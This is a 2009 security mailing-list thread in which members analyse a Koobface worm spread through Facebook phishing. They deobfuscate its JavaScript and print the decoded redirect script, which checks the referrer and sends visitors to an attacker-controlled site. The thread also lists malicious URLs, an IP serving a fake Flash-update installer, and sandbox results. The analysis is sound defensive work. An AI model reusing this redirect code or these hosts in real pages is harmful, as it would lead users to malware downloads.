The URL is encoded in this line: n516dc="hfdftfktfffkpfj:gjj/j/gfwwkdwdf.bujkskifnjfekdsgfsginkadboxj.cgojfmfkg.fjafkgugf/jfk3jfk5k7kj/fgg".replace(/[fdkjg]+/g,"");
The replace command as used here is basically replacing the specified characters with 'nothing'... so once you've stripped out all the fdkjg characters, this is what's left: n516dc="http://www.businessinabox.com.au/357/";; For anybody who's interested, the full decoded (and somewhat simplified and commented) script is as follows: oa8ea5=eval("document.referrer").indexOf("msplinks.com"); pab=eval("document.referrer").indexOf("myspace.com"); qa53a=eval("document.referrer").indexOf("lnk.ms"); //If the referrer contains any of the above strings, then append '&ms' to the query bf2ebbb9=''; if(oa8ea5+pab+qa53a!=-3)bf2ebbb9='&ms'; location="http://www.businessinabox.com.au/357/?go"+bf2ebbb9; The script at the specified location is what actually redirects to the attack sites... -Dave From: [email protected] [mailto:[email protected]] On Behalf Of Chris Blazek Sent: Wednesday, December 02, 2009 2:28 PM To: PaulDotCom Security Weekly Mailing List Subject: Re: [Pauldotcom] phishing question That section you unwrapped looks like it sets a location variable that is then used in the google friend connect stuff. I went looking through the script blocks and I'm not finding any reference to the businessinabox site. How did you get to that point? Just curious, trying to learn. Chris On Wed, Dec 2, 2009 at 1:01 PM, Chris Blazek <[email protected]<mailto:[email protected]>> wrote: Thanks! The user sent me a snapshot of symantec finding the koobface infection. I found a mcafee article that mentions the worm on what David found: http://vil.nai.com/vil/content/v_148955.htm I was trying to use malzilla to decode that script block but really didn't have much luck because of my experience with the app. Thanks for the help, great community! Chris On Wed, Dec 2, 2009 at 12:03 PM, David Auclair <[email protected]<mailto:[email protected]>> wrote: The obfuscation wasn't too bad in this case... Just a couple tricks repeated over and over. I manually 'unwrapped' the layers of obfuscation, and ended up with some pretty simple code. For example: c4239='do'; db749="coaujoimrggh".replace(/[oajirgh]+/g,""); eaf76='ent.r'; f638e36f4="esgkfkusueduvrbo".replace(/[sgkudvbo]+/g,""); gda746b57='rer'; a206c=eval(c4239+db749+eaf76+f638e36f4+gda746b57); Is basically a set of strings containing extra characters, that are stripped out by the replace commands, then merged. This can be simplified to: c4239='do'; db749="cum"; eaf76='ent.r'; f638e36f4="efer"; gda746b57='rer'; a206c=eval("document.referer"); -Dave > -----Original Message----- > From: > [email protected]<mailto:[email protected]> > > [mailto:[email protected]<mailto:[email protected]>] > On Behalf > Of David Shpritz > Sent: Wednesday, December 02, 2009 12:44 PM > To: PaulDotCom Security Weekly Mailing List > Subject: Re: [Pauldotcom] phishing question > > Hey David, > Would you mind telling us what method you used to deobfuscate the scripts? > Usually I have done these > by hand or used Malzilla, but I'm always looking for new methods. Thanks! > > David Shpritz > > -----Original Message----- > From: > [email protected]<mailto:[email protected]> > > [mailto:[email protected]<mailto:[email protected]>] > On Behalf Of David Auclair > Sent: Wednesday, December 02, 2009 9:45 AM > To: PaulDotCom Security Weekly Mailing List > Subject: Re: [Pauldotcom] phishing question > > It looks like the javascript on the page you mentioned leads to this page: > hxxp://www . businessinabox . com . au/357/?go > > Which is full of more obfuscated javascript, which leads to sites such as: > hxxp:// 62.204.113.141 > /d=www.facebook.com/0x3E8/f=fb2/view/console=yes/<http://www.facebook.com/0x3E8/f=fb2/view/console=yes/> > > Which seems to have 'you need to update your flash player' image, linking to > setup.exe > > According to virustotal, the setup.exe contains koobface: > http://www.virustotal.com/analisis/5e9ce9c41a8f46d5dfc4ce366f6f47cb347bcbaa93cd1fcb132a72f61bab14e1- > 1259705119 > > -Dave > > > -----Original Message----- > > From: > > [email protected]<mailto:[email protected]> > > > > [mailto:[email protected]<mailto:[email protected]>] > > On > Behalf > > Of Chris Blazek > > Sent: Wednesday, December 02, 2009 12:04 AM > > To: PaulDotCom Security Weekly Mailing List > > Subject: Re: [Pauldotcom] phishing question > > > > PJ, > > Yeah, I had the user change all passwords from the email account to > > fb. I had tried googling for that 1st part of the address, hoping > > someone had posted something about it. That came up empty. > > I tried to get malzilla to decode it, but I really have little > > experience decoding JavaScript like that. > > I'll try looking for deobfuscaters to see if something else can decode > > it. > > Sorry for the typos in the original email. :) > > > > Thanks for the help! > > > > Chris > > > > > > > > On Dec 1, 2009, at 8:47 PM, PJ McGarvey > > <[email protected]<mailto:[email protected]>> wrote: > > > > > Well, if you mean what does the obfuscated code do, there are a few > > > sites I've used that can "de-obfuscate" code however sometimes all > > > that can tell you is that "yeah, it's probably malicious". I would > > > google for "javascript deobfuscate". > > > > > > You could submit the blogspot site to an online sandbox for > > > analysis, like I just did: > > > > > > http://anubis.iseclab.org/?action=result&task_id=1c4a179271c4d4ee4f5b9820e431f7281&format=html > > > > > > and possibly find other URLs found in the de-obfuscated code to see > > > what they do.... like this one > > > http://1nonsensical.cn/?pid=312s02&sid=4db12f > > > > > > ... I've yet to find a .cn domain name I could trust. LOL. > > > > > > Follow down the rabbit hole... > > > > > > That way you can find out if the PC was infected, and how to clean > > > it up. > > > > > > Otherwise it would seem like some sort of facebook worm that spreads > > > using the FB address book. Was the user logged into Facebook at the > > > time? Might be a good idea to change their password, sounds like it > > > either used the active facebook session to send itself out, or maybe > > > a cookie with the user's saved credentials. > > > > > > PJ > > > > > > From: [email protected]<mailto:[email protected]> > > > Date: Tue, 1 Dec 2009 14:54:36 -0600 > > > To: [email protected]<mailto:[email protected]> > > > Subject: [Pauldotcom] phishing question > > > > > > A coworker clicked on a link in an email and was directed to > > > facebook then redirected to the following site: > > > despatiesmercemerce . blogspot . com > > > All of there fb contacts then received the same email. I pulled up > > > the site in malzilla and noticed a script block in the header that > > > looks like it's obfuscated. > > > > > > I was wondering if someone in the group could figure out what the > > > site was trying to do. > > > > > > Thanks, > > > Chris > > > > > > > > > _______________________________________________ > > > Pauldotcom mailing list > > > [email protected]<mailto:[email protected]> > > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > > Main Web Site: http://pauldotcom.com > > _______________________________________________ > > Pauldotcom mailing list > > [email protected]<mailto:[email protected]> > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > _______________________________________________ > Pauldotcom mailing list > [email protected]<mailto:[email protected]> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ > Pauldotcom mailing list > [email protected]<mailto:[email protected]> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list [email protected]<mailto:[email protected]> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com -- http://www.kingbin.net/ -- http://www.kingbin.net/ Sent from Lubbock, TX, United States
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
